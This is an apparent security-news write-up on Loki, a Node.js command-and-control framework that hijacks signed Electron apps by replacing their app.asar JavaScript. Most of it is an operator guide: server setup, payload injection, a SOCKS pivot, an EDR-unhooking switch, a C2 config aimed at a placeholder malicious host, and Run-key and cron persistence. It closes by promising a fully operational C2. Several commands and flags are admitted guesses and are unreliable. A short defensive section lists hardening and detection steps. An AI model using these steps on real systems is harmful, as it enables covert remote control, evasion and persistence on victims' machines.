
GitHub – boku7/Loki: https://github.com/boku7/Loki
Loki is a Node.js-based Command & Control (C2) framework built around script-jacking of Electron applications. The weakness it abuses is structural: a signed Electron binary loads its application JavaScript from an unsigned, plaintext archive (resources/app.asar) in its install directory, so anyone who can write to that directory can replace the JavaScript and have the trusted, signed process run the agent. The repository summary lists SOCKS proxy support (with claimed speeds up to 29MB/s), reflective loading, message queuing (MQ), a built-in C2 server, multiple C2 transport mechanisms, and evasion techniques.
You Should Know:
1. Setting Up Loki C2 Server
Loki needs Node.js on the server host. Clone the repository and install dependencies (the script names and flags in this write-up are illustrative; the repository README is the authority for the actual build and start commands):
git clone https://github.com/boku7/Loki.git
cd Loki
npm install
Start the C2 server:
node server.js
2. Reflective Loading for Stealth
Reflective loading brings a payload into the agent's process memory without writing it to disk, which removes the file artifact that on-access AV scanning keys on. Illustrative invocation:
node inject.js --payload malicious.js --target electron_app.exe
3. SOCKS Proxy for Pivoting
The SOCKS5 proxy turns the compromised host into a pivot so operator tooling can reach the internal network through the agent; it is not an anonymity feature, since internal targets see the compromised host's address. Illustrative start command:
node socks_proxy.js --port 9050
Verify the tunnel and measure throughput against a host the proxy can reach (placeholder URL; --socks5-hostname makes DNS resolve on the far side of the tunnel):
curl --socks5-hostname 127.0.0.1:9050 -o /dev/null -w '%{speed_download}\n' http://internal-host.example/large-file
4. Exploiting Electron Apps
Script-jacking does not depend on a web-exposed bug or on the app's `nodeIntegration` setting: the main process of every Electron app runs with full Node.js privileges, so any JavaScript written into the app's resources directory (inside app.asar, or as an unpacked main.js) executes as the signed application the next time it starts. A payload as small as this is enough to prove execution:
// malicious.js
require('child_process').exec('calc.exe');
Illustrative injection command (in practice the prerequisite is write access to the target's install directory on the victim host, not a URL):
node exploit.js --url http://vulnerable-app.com --payload malicious.js
5. Evasion Techniques
The evasion that script-jacking buys is structural: the agent is JavaScript executing inside a legitimately signed Electron process, often one that is already allow-listed, with no dropped executable and no injected native code, so EDR telemetry built around new binaries and cross-process injection has little to key on. Process hollowing and API unhooking are native-code techniques; the repository summary above lists only "evasion techniques" generically, so treat the following switch as illustrative rather than as a documented Loki flag:
node payload.js --evasion --technique unhook
6. Multi-Transport C2 Communication
The repository summary lists multiple C2 transports. HTTP, DNS and WebSocket are the usual options, each with a different detection surface: DNS survives strict egress filtering but is slow and noisy in resolver logs, while WebSocket over TLS blends into ordinary browser-like traffic. Illustrative configuration (the endpoint is a placeholder):
{
  "transport": "websocket",
  "endpoint": "wss://malicious-c2.com"
}
7. Persistence Mechanisms
Relaunch the agent at logon (Windows Run key) or at boot (Linux cron). The Run value must name the interpreter: a bare .js path would be handed to Windows Script Host, not to Node.
Windows:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Loki /t REG_SZ /d "C:\path\to\node.exe C:\path\to\loki.js"
Linux:
(crontab -l 2>/dev/null; echo "@reboot /usr/bin/node /path/to/loki.js") | crontab -
With script-jacking, the backdoored application is itself the persistence: the agent runs every time the user opens the app, leaving no registry or cron artifact to find.
What Undercode Say:
Loki demonstrates how Electron applications can be weaponized when their JavaScript is loaded without integrity checks. Defenders should:
– Ship Electron apps with the fuses EnableEmbeddedAsarIntegrityValidation and OnlyLoadAppFromAsar enabled, so a modified app.asar is refused at startup, and install them under a directory standard users cannot write to rather than per-user %LOCALAPPDATA%.
– Disable `nodeIntegration` and enable `contextIsolation` and `sandbox` in every BrowserWindow (webPreferences: { nodeIntegration: false, contextIsolation: true, sandbox: true }). This hardens renderers against hostile web content; it does not by itself stop script-jacking of the main process.
– Monitor Electron apps spawning shells or unusual child processes (Linux/macOS: ps aux | grep -E 'node|electron'; on Windows, alert on cmd.exe or powershell.exe whose parent is a signed Electron app).
– Inspect unexpected SOCKS listeners and proxied traffic (netstat -tulnp | grep 9050, or ss -tulnp on current Linux).
– Baseline file hashes of each deployed Electron app's resources directory and alert on changes to app.asar or on new .js files beside it.
– Use YARA rules to detect Loki artifacts (the string below is a placeholder from this write-up; derive real indicators from the repository's agent source):
rule Loki_C2 {
    strings:
        $c2 = "loki_server" nocase
    condition:
        any of them
}
– Treat obfuscated JavaScript inside an app's resources as suspicious: vendors ship readable or minified code, and a packer or string-encoding layer in main.js is a strong script-jacking signal.
For red teams, Loki provides a flexible C2 framework, but always operate under authorized engagements.
Expected Output:
A fully operational Loki C2 server with SOCKS proxy, evasion techniques, and Electron app exploitation capabilities.
Reported By: Bobby Cooke – Hackers Feeds